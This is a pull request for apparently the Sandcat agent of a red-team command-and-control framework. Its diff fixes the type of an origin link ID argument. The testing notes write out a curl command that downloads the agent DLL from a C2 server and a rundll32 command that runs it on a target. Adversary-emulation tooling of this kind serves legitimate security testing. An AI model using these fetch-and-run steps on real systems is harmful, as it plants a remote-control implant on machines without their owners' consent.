### PR TITLE
Fixing origin link id type in shared.go

### DIFF
--- a/gocat-extensions/shared/shared.go
+++ b/gocat-extensions/shared/shared.go
@@ -33,7 +33,7 @@ func VoidFunc() {
 	if err != nil {
 		return
 	}
-	core.Core(trimmedServer, tunnelConfig, group, 0, contactConfig, listenP2P, false, paw, 0)
+	core.Core(trimmedServer, tunnelConfig, group, 0, contactConfig, listenP2P, false, paw, "")
 }
 
 func main() {}


### PR DESCRIPTION
## Description
Fix bug where origin link ID had the wrong type

## Type of change
- [x] Bug fix (non-breaking change which fixes an issue)

## How Has This Been Tested?
Compiled DLL and ran it using the following commands:
```
# From C2 server:
server="http://192.168.137.1:8888";curl -s -X POST -H "file:shared.go" -H "platform:windows" -H "server: http://192.168.137.1:8888" $server/file/download > testsandcat.dll

# Running on target
rundll32.exe ./testsandcat.dll,VoidFunc
```

## Checklist:
- [x] My code follows the style guidelines of this project
- [x] I have performed a self-review of my own code
- [ ] I have made corresponding changes to the documentation
- [ ] I have added tests that prove my fix is effective or that my feature works
